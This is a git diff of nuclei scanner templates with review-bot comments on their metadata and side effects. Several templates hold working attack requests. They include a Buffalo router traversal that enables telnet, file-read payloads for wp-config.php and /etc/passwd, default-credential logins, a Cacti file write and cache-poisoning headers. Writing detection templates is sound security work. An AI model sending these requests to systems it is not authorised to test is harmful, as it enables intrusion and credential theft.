@@ -0,0 +1,34 @@ +id: buffalo-config-injection + +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: gy741 + severity: critical + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + reference: + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: buffalo,firmware,iot + +requests: + - raw: + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Connection: close + + action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A + ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/Success.htm" + + - type: status + status: + - 302 \ No newline at end of file diff --git a/nuclei-templates/Other/buffalo-config-injection.yaml b/nuclei-templates/Other/buffalo-config-injection.yaml deleted file mode 100644 index d02f4693f2..0000000000 --- a/nuclei-templates/Other/buffalo-config-injection.yaml +++ /dev/null 
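Review bot: The new `buffalo-config-injection-800.yaml` omits `classification:` / `cve-id: CVE-2021-20090` and the NVD reference `https://nvd.nist.gov/vuln/detail/CVE-2021-20090` that the deleted `buffalo-config-injection.yaml` carried, so a `critical` finding loses its CVE linkage and can no longer be correlated with advisories or patch status; those three lines should be restored under `reference` and `classification`. The description edit (`<=1.02` to `<= 1.02`, sentence reordered) is wording only. The file also ends without a trailing newline (`\ No newline at end of file`).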
@@ -1,35 +0,0 @@ -id: buffalo-config-injection -info: - name: Buffalo WSR-2533DHPL2 - Configuration File Injection - author: gy741 - severity: critical - description: | - Buffalo WSR-2533DHPL2 firmware version <=1.02 and WSR-2533DHP3 firmware version <=1.24 do not properly sanitize user input via their web interfaces. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. - reference: - - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - classification: - cve-id: CVE-2021-20090 - tags: buffalo,firmware,iot -requests: - - raw: - - | - POST /images/..%2fapply_abstract.cgi HTTP/1.1 - Host: {{Hostname}} - Connection: close - - action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A - ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/Success.htm" - - type: status - status: - - 302 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/Other/buildbot-panel.yaml b/nuclei-templates/Other/buildbot-panel.yaml index 894c357bbc..c7713e24e5 100644 --- a/nuclei-templates/Other/buildbot-panel.yaml +++ b/nuclei-templates/Other/buildbot-panel.yaml 
@@ -1,25 +1,28 @@ id: buildbot-panel info: - name: Buildbot Panel + name: Buildbot Panel Detect author: thardt-praetorian severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22BuildBot%22 + reference: https://buildbot.net + metadata: + shodan-query: http.title:"BuildBot" tags: panel,buildbot,cicd requests: - method: GET - redirects: true - max-redirects: 5 path: - - '{{BaseURL}}/' + - '{{BaseURL}}' + redirects: true + max-redirects: 2 matchers-condition: and matchers: - - type: word - words: - - '>Buildbot' + - type: regex + part: body + regex: + - 'Buildbot' - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/nuclei-templates/Other/bullwark-momentum-lfi-807.yaml b/nuclei-templates/Other/bullwark-momentum-lfi.yaml similarity index 100% rename from nuclei-templates/Other/bullwark-momentum-lfi-807.yaml rename to nuclei-templates/Other/bullwark-momentum-lfi.yaml diff --git a/nuclei-templates/Other/businessintelligence-default-login-814.yaml b/nuclei-templates/Other/businessintelligence-default-login-814.yaml deleted file mode 100644 index da9a4e3f80..0000000000 --- a/nuclei-templates/Other/businessintelligence-default-login-814.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: oracle-business-intelligence-login -info: - name: Oracle Business Intelligence Default Login - author: milo2012 - severity: high - tags: oracle,default-login -requests: - - raw: - - | - POST /xmlpserver/services/XMLPService HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - SOAPAction: "" - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - - - - - - {{username}} - {{password}} - bi - - - - payloads: - username: - - Administrator - password: - - Administrator - attack: pitchfork - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'createSessionReturn' - part: body 
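Review bot: The new matcher `type: regex` with `regex: - 'Buildbot'` is a bare literal, and combined with a 200 it fires on any page that mentions the word Buildbot anywhere in its body (a changelog, a blog post), whereas the line it replaces was anchored on a tag boundary with `'>Buildbot'`. If the anchored form was too strict on some versions, keep a `word` matcher and anchor it some other way rather than matching a free-floating word, e.g. `- type: word` / `part: body` / `words: - '>Buildbot'`. A regex matcher buys nothing over `type: word` for a literal with no metacharacters.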
diff --git a/nuclei-templates/Other/businessintelligence-default-login.yaml b/nuclei-templates/Other/businessintelligence-default-login.yaml new file mode 100644 index 0000000000..87fad6bf56 --- /dev/null +++ b/nuclei-templates/Other/businessintelligence-default-login.yaml @@ -0,0 +1,50 @@ +id: oracle-business-intelligence-login +info: + name: Oracle Business Intelligence Default Login + author: milo2012 + description: Oracle Business Intelligence default admin credentials were discovered. + severity: high + tags: oracle,default-login + reference: + - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /xmlpserver/services/XMLPService HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + SOAPAction: "" + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + + + + + + {{username}} + {{password}} + bi + + + + payloads: + username: + - Administrator + password: + - Administrator + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'createSessionReturn' + part: body + +# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/Other/buttercms.yaml b/nuclei-templates/Other/buttercms.yaml new file mode 100644 index 0000000000..5f0e88e387 --- /dev/null +++ b/nuclei-templates/Other/buttercms.yaml @@ -0,0 +1,23 @@ +id: api-buttercms + +info: + name: ButterCMS API Test + author: zzeitlin + reference: https://buttercms.com/docs/api/#introduction + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and \ No newline at end of file 
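Review bot: `cve-id:` under `classification` is left empty, which YAML loads as a null value rather than an absent field; either drop the line (`cwe-id: CWE-522` alone is enough for a default-credentials check) or fill it in. The SOAP envelope between the request headers and `payloads` appears with its XML elements stripped in this view, so the actual body could not be reviewed here; confirm the committed file still carries the full envelope whose reply the `createSessionReturn` matcher expects.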
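Review bot: The new `buttercms.yaml` has no `tags:` line, unlike the token-spray template this change removes (`circleci.yaml` had `tags: token-spray,circleci`), so it cannot be selected with `-tags token-spray` and is likely to be picked up in ordinary runs despite `self-contained: true`. Add `tags: token-spray,buttercms` under `info`. It also places `{{token}}` in the query string; that is what the referenced API documents, but a one-line `description` noting the token will land in proxy and server access logs would be useful to whoever sprays real tokens with it.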
diff --git a/nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml b/nuclei-templates/Other/cab-fare-calculator-lfi.yaml similarity index 100% rename from nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml rename to nuclei-templates/Other/cab-fare-calculator-lfi.yaml diff --git a/nuclei-templates/Other/cache-poisoning-823.yaml b/nuclei-templates/Other/cache-poisoning-823.yaml new file mode 100644 index 0000000000..866bb48031 --- /dev/null +++ b/nuclei-templates/Other/cache-poisoning-823.yaml @@ -0,0 +1,27 @@ +id: cache-poisoning + +info: + name: HTTP Cache Poisoning + author: sirpedrotavares / seguranca-informatica.pt + severity: medium + +requests: + - raw: + - | + GET /?evil=007 HTTP/1.1 + X-Forwarded-Prefix: cache.my.evil.dns.com + X-Forwarded-Host: cache.my.evil.dns.com + X-Forwarded-For: cache.my.evil.dns.com + X-Originating-IP: cache.my.evil.dns.com + X-Remote-IP: cache.my.evil.dns.com + X-Remote-Addr: cache.my.evil.dns.com + X-Client-IP: cache.my.evil.dns.com + + - | + GET /?evil=007 HTTP/1.1 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "cache.my.evil.dns.com") == true' diff --git a/nuclei-templates/Other/cache_piossing (copy 1).yaml b/nuclei-templates/Other/cache_piossing (copy 1).yaml deleted file mode 100644 index 0a5918b84b..0000000000 --- a/nuclei-templates/Other/cache_piossing (copy 1).yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: cache-poisoning - -info: - name: Cache Poisoning - author: melbadry9 & xelkomy - severity: low - -requests: - - raw: - - | - GET /?mel=9 HTTP/1.1 - X-Forwarded-Prefix: cache.melbadry9.com - X-Forwarded-Host: cache.melbadry9.com - X-Forwarded-For: cache.melbadry9.com - - - | - GET /?mel=9 HTTP/1.1 - - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "cache.melbadry9.com") == true' 
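Review bot: Every run of the new cache-poisoning template poisons the same cache key, `GET /?evil=007`, with the literal `cache.my.evil.dns.com`, and a positive result means the target's cache is now serving that value to anyone who requests that URL until it expires; the template should state this in a `description` and carry `intrusive` in `tags`. The cache-buster should also differ per run (`/?evil={{randstr}}` in both requests, assuming `randstr` is stable across the two requests of one execution — confirm) so the verdict reflects this run's reflection and not an entry poisoned by an earlier scan. Neither raw request has a `Host: {{Hostname}}` line, unlike the other raw templates in this diff; unless that is an extraction artifact, add it.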
diff --git a/nuclei-templates/Other/cacti-panel-829.yaml b/nuclei-templates/Other/cacti-panel.yaml similarity index 100% rename from nuclei-templates/Other/cacti-panel-829.yaml rename to nuclei-templates/Other/cacti-panel.yaml diff --git a/nuclei-templates/Other/cacti-weathermap-file-write-833.yaml b/nuclei-templates/Other/cacti-weathermap-file-write-833.yaml deleted file mode 100644 index 4a23dacbb9..0000000000 --- a/nuclei-templates/Other/cacti-weathermap-file-write-833.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: cacti-weathermap-file-write -info: - name: Cacti Weathermap File Write - author: pikpikcu - severity: medium - reference: - - https://www.freebuf.com/articles/system/125177.html - tags: injection,cacti -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7" - - method: GET - path: - - "{{BaseURL}}/plugins/weathermap/configs/poc.conf" - matchers-condition: and - matchers: - - type: word - words: - - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/cacti-weathermap-file-write.yaml b/nuclei-templates/Other/cacti-weathermap-file-write.yaml new file mode 100644 index 0000000000..04a5d1b654 --- /dev/null +++ b/nuclei-templates/Other/cacti-weathermap-file-write.yaml 
@@ -0,0 +1,26 @@ +id: cacti-weathermap-file-write + +info: + name: Cacti Weathermap File Write + author: pikpikcu + severity: medium + reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7" + - method: GET + path: + - "{{BaseURL}}/plugins/weathermap/configs/poc.conf" + + matchers-condition: and + matchers: + - type: word + words: + - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/call-break-cms-840.yaml b/nuclei-templates/Other/call-break-cms.yaml similarity index 100% rename from nuclei-templates/Other/call-break-cms-840.yaml rename to nuclei-templates/Other/call-break-cms.yaml diff --git a/nuclei-templates/Other/campaignmonitor-842.yaml b/nuclei-templates/Other/campaignmonitor-842.yaml new file mode 100644 index 0000000000..1ad9814f94 --- /dev/null +++ b/nuclei-templates/Other/campaignmonitor-842.yaml @@ -0,0 +1,17 @@ +id: campaignmonitor-takeover +info: + name: campaignmonitor takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - 'Trying to access your account?' + - 'or Trying to access your account?' - - 'or ' - - '404 Not Found
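Review bot: The first request of `cacti-weathermap-file-write.yaml` writes `plugins/weathermap/configs/poc.conf` on the target and nothing removes it, so every positive hit leaves a file behind on the scanned host, which `info` does not mention. Add a `description` stating that the check creates that file and it should be deleted after testing, and add `intrusive` to `tags`. The fixed `mapname=poc.conf` also means every scanner overwrites the same path; a per-run name (`{{randstr}}.conf` in both requests, if `randstr` is stable within one execution — confirm) would avoid clobbering and make the artifact attributable.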
' - condition: and diff --git a/nuclei-templates/Other/cargocollective-takeover.yaml b/nuclei-templates/Other/cargocollective-takeover.yaml new file mode 100644 index 0000000000..fac909397b --- /dev/null +++ b/nuclei-templates/Other/cargocollective-takeover.yaml @@ -0,0 +1,18 @@ +id: cargocollective-takeover +info: + name: cargocollective takeover detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - '
' + - '404 Not Found
' + condition: and diff --git a/nuclei-templates/Other/cas-login-870.yaml b/nuclei-templates/Other/cas-login-870.yaml new file mode 100644 index 0000000000..b2f2d90bea --- /dev/null +++ b/nuclei-templates/Other/cas-login-870.yaml @@ -0,0 +1,19 @@ +id: cas-login +info: + name: CAS Login Panel + author: pdteam + severity: info + metadata: + shodan-query: http.title:'CAS - Central Authentication Service' + github: https://github.com/apereo/cas + tags: apereo,cas,panel,login +requests: + - method: GET + path: + - "{{BaseURL}}/cas/login" + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - 'Central Authentication Service' diff --git a/nuclei-templates/Other/cas-login.yaml b/nuclei-templates/Other/cas-login.yaml deleted file mode 100644 index 8a225d7e04..0000000000 --- a/nuclei-templates/Other/cas-login.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cas-login - -info: - name: CAS Login Panel - author: pdteam - severity: info - tags: apereo,cas,panel,login - metadata: - shodan-query: http.title:'CAS - Central Authentication Service' - github: https://github.com/apereo/cas - -requests: - - method: GET - path: - - "{{BaseURL}}/cas/login" - - redirects: true - max-redirects: 2 - matchers: - - type: word - words: - - 'Central Authentication Service' diff --git a/nuclei-templates/Other/centreon-detect-875.yaml b/nuclei-templates/Other/centreon-detect-875.yaml new file mode 100644 index 0000000000..8c77644cef --- /dev/null +++ b/nuclei-templates/Other/centreon-detect-875.yaml @@ -0,0 +1,24 @@ +id: centreon-detect + +info: + name: Centreon Detect + author: pikpikcu + severity: info + tags: tech,centreon + +requests: + - method: GET + path: + - "{{BaseURL}}/centreon/index.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Centreon - IT & Network Monitoring" + + - type: status + status: + - 200 
diff --git a/nuclei-templates/Other/centreon-detect-877.yaml b/nuclei-templates/Other/centreon-detect-877.yaml deleted file mode 100644 index c3ca5df6a4..0000000000 --- a/nuclei-templates/Other/centreon-detect-877.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: centreon-detect - -info: - name: Centreon Detect - author: pikpikcu - severity: info - tags: tech,centreon - -requests: - - method: GET - path: - - "{{BaseURL}}/centreon/index.php" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Centreon - IT & Network Monitoring" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/certificate-validation-882.yaml b/nuclei-templates/Other/certificate-validation-882.yaml new file mode 100644 index 0000000000..c8969eea4f --- /dev/null +++ b/nuclei-templates/Other/certificate-validation-882.yaml @@ -0,0 +1,12 @@ +id: improper-certificate-validation +info: + name: Improper Certificate Validation + author: gaurang + severity: medium +file: + - extensions: + - all + matchers: + - type: word + words: + - "Landroid/webkit/SslErrorHandler;->proceed()V" diff --git a/nuclei-templates/Other/certificate-validation.yaml b/nuclei-templates/Other/certificate-validation.yaml deleted file mode 100644 index 64a9fecc52..0000000000 --- a/nuclei-templates/Other/certificate-validation.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: improper-certificate-validation - -info: - name: Improper Certificate Validation - author: gaurang - severity: medium - tags: android,file - -file: - - extensions: - - all - - matchers: - - type: word - words: - - "Landroid/webkit/SslErrorHandler;->proceed()V" \ No newline at end of file diff --git a/nuclei-templates/Other/cgi-printenv-886.yaml b/nuclei-templates/Other/cgi-printenv-886.yaml index 0deacd17e0..0410dfbd68 100644 --- a/nuclei-templates/Other/cgi-printenv-886.yaml +++ b/nuclei-templates/Other/cgi-printenv-886.yaml 
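Review bot: The new `certificate-validation-882.yaml` drops the `tags: android,file` line that the version it replaces (deleted on this same line) carried, so the template no longer appears under the `android` or `file` tag selections; restore it under `info`. A match on `Landroid/webkit/SslErrorHandler;->proceed()V` only shows that the call exists, not that it is reached unconditionally — an app may call `proceed()` after its own pinning check — so a `description` along the lines of "Flags any call to SslErrorHandler.proceed(); review the surrounding onReceivedSslError handler manually" would set expectations for triage.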
@@ -1,15 +1,19 @@ id: cgi-printenv + info: - author: emadshanab name: CGI script environment variable + author: emadshanab severity: medium description: A test CGI (Common Gateway Interface) script was found on this server. The response page returned by this CGI script is leaking a list of server environment variables. - reference: https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/ + reference: + - https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/ tags: exposure,generic,cgi + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/printenv.pl" + matchers-condition: and matchers: - type: word @@ -20,6 +24,7 @@ requests: - 'SERVER_ADMIN' - 'Environment Variables:' condition: or + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/cgi-test-page-890.yaml b/nuclei-templates/Other/cgi-test-page.yaml similarity index 100% rename from nuclei-templates/Other/cgi-test-page-890.yaml rename to nuclei-templates/Other/cgi-test-page.yaml diff --git a/nuclei-templates/Other/chamilo-lms-sqli-891.yaml b/nuclei-templates/Other/chamilo-lms-sqli-892.yaml similarity index 100% rename from nuclei-templates/Other/chamilo-lms-sqli-891.yaml rename to nuclei-templates/Other/chamilo-lms-sqli-892.yaml diff --git a/nuclei-templates/Other/chamilo-lms-xss.yaml b/nuclei-templates/Other/chamilo-lms-xss.yaml index 77ecc3124b..0818c85597 100644 --- a/nuclei-templates/Other/chamilo-lms-xss.yaml +++ b/nuclei-templates/Other/chamilo-lms-xss.yaml @@ -1,7 +1,7 @@ id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting - author: geeknik + author: nithissh severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo diff --git a/nuclei-templates/Other/checkmarx-panel-895.yaml b/nuclei-templates/Other/checkmarx-panel-895.yaml deleted file mode 100644 index 70b24b66eb..0000000000 
--- a/nuclei-templates/Other/checkmarx-panel-895.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: checkmarx-panel-detect - -info: - name: Checkmarx WebClient detector - author: joanbono - severity: info - tags: panel,checkmarx - -requests: - - method: GET - path: - - "{{BaseURL}}/cxwebclient/Login.aspx" - - matchers: - - type: word - words: - - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' - part: body diff --git a/nuclei-templates/Other/checkmarx-panel-897.yaml b/nuclei-templates/Other/checkmarx-panel-897.yaml new file mode 100644 index 0000000000..4aa65b0e49 --- /dev/null +++ b/nuclei-templates/Other/checkmarx-panel-897.yaml @@ -0,0 +1,19 @@ +id: checkmarx-panel-detect + +info: + name: Checkmarx WebClient detector + author: joanbono + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cxwebclient/Login.aspx" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: + - type: word + words: + - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' + part: body diff --git a/nuclei-templates/Other/checkpoint-panel-899.yaml b/nuclei-templates/Other/checkpoint-panel-898.yaml similarity index 100% rename from nuclei-templates/Other/checkpoint-panel-899.yaml rename to nuclei-templates/Other/checkpoint-panel-898.yaml diff --git a/nuclei-templates/Other/cherry-lfi-903.yaml b/nuclei-templates/Other/cherry-lfi-903.yaml new file mode 100644 index 0000000000..b0b6c0a44f --- /dev/null +++ b/nuclei-templates/Other/cherry-lfi-903.yaml 
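Review bot: In the new `checkmarx-panel-897.yaml` the tag list shrinks from `panel,checkmarx` (in the file removed just before it) to `panel`, so the template is no longer selectable by product; restore `tags: panel,checkmarx`. The hard-coded `User-Agent` header carries no explanation of why the scanner default is insufficient; if the login page genuinely needs a browser UA, say so in a comment on that line, otherwise drop it to keep the request consistent with the other panel templates in this diff.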
@@ -0,0 +1,36 @@
+id: cherry-lfi
+
+info:
+ name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
+ author: dhiyaneshDK
+ severity: high
+ description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the
+ wp-config.php file.
+ reference:
+ - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
+ - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cwe-id: CWE-22
+ tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/Other/cherry-lfi.yaml b/nuclei-templates/Other/cherry-lfi.yaml
deleted file mode 100644
index 7df075f0c8..0000000000
--- a/nuclei-templates/Other/cherry-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@ -id: cherry-lfi -info: - name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download - author: dhiyaneshDK - severity: high - description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. - reference: - - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE - tags: wordpress,wp-plugin,lfi,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/chinaunicom-default-login-906.yaml b/nuclei-templates/Other/chinaunicom-default-login-906.yaml deleted file mode 100644 index ad88f640d7..0000000000 --- a/nuclei-templates/Other/chinaunicom-default-login-906.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: chinaunicom-default-login -info: - name: China Unicom Modem Default Login - author: princechaddha - severity: high - description: Default login credentials were discovered for a China Unicom modem. - classification: - cwe-id: CWE-798 - tags: chinaunicom,default-login -requests: - - raw: - - | - POST /cu.html HTTP/1.1 - Host: {{Hostname}} - - frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= - attack: pitchfork - payloads: - username: - - CUAdmin - password: - - CUAdmin - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - words: - - "/menu.gch" - part: header - -# Enhanced by mp on 2022/03/03 
diff --git a/nuclei-templates/Other/chinaunicom-default-login.yaml b/nuclei-templates/Other/chinaunicom-default-login.yaml new file mode 100644 index 0000000000..0121060abf --- /dev/null +++ b/nuclei-templates/Other/chinaunicom-default-login.yaml @@ -0,0 +1,28 @@ +id: chinaunicom-default-login +info: + name: Chinaunicom Modem Default Login + author: princechaddha + severity: high + tags: chinaunicom,default-login +requests: + - raw: + - | + POST /cu.html HTTP/1.1 + Host: {{Hostname}} + + frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= + attack: pitchfork + payloads: + username: + - CUAdmin + password: + - CUAdmin + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - "/menu.gch" + part: header diff --git a/nuclei-templates/Other/church-admin-lfi-912.yaml b/nuclei-templates/Other/church-admin-lfi-912.yaml deleted file mode 100644 index 9885353c52..0000000000 --- a/nuclei-templates/Other/church-admin-lfi-912.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: church-admin-lfi - -info: - name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal - author: 0x_Akoko - severity: high - description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack. - reference: - - https://wpscan.com/vulnerability/8997 - - https://id.wordpress.org/plugins/church-admin/ - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/church-admin-lfi.yaml b/nuclei-templates/Other/church-admin-lfi.yaml new file mode 100644 index 0000000000..130de762a2 --- /dev/null +++ b/nuclei-templates/Other/church-admin-lfi.yaml 
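Review bot: The replacement `chinaunicom-default-login.yaml` drops both the `description` and the `classification:` / `cwe-id: CWE-798` block that the file removed just before it on this line carried, a net loss of metadata for a default-credentials check; restore them. The POST body sends `Username` and `Password` twice, once templated and once empty; if the device's login handler requires the trailing empty pair, a one-line comment saying so would stop the next editor from "cleaning" it up, and if it does not, the duplicates should go.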
@@ -0,0 +1,28 @@ +id: church-admin-lfi +info: + name: WordPress Church Admin 0.33.2.1 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php. + reference: + - https://wpscan.com/vulnerability/8997 + - https://id.wordpress.org/plugins/church-admin/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/nuclei-templates/Other/circarlife-setup-920.yaml b/nuclei-templates/Other/circarlife-setup-920.yaml new file mode 100644 index 0000000000..808a1e8646 --- /dev/null +++ b/nuclei-templates/Other/circarlife-setup-920.yaml @@ -0,0 +1,28 @@ +id: circarlife-setup +info: + name: Exposed CirCarLife Setup Page + author: geeknik + description: CirCarLife is an internet-connected electric vehicle charging station + reference: https://circontrol.com/ + severity: critical + tags: scada,circontrorl,circarlife,setup,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/html/setup.html" + matchers-condition: and + matchers: + - type: word + part: header + words: + - "CirCarLife Scada" + - type: word + words: + - "- setup" + - "Network setup" + - "Modem setup" + - "Security setup" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/circarlife-setup.yaml b/nuclei-templates/Other/circarlife-setup.yaml deleted file mode 100644 index 13d2489404..0000000000 --- a/nuclei-templates/Other/circarlife-setup.yaml +++ /dev/null 
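Review bot: In the new `circarlife-setup-920.yaml` the tag `circontrorl` is a typo for the vendor name (`circontrol`, matching the `reference` URL) copied over from the file being deleted, so the template stays unreachable by vendor tag; fix it while the file is being rewritten. The `panel` tag the old version had is also dropped even though the template matches a setup page. Propose `tags: scada,circontrol,circarlife,setup,exposure,panel`.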
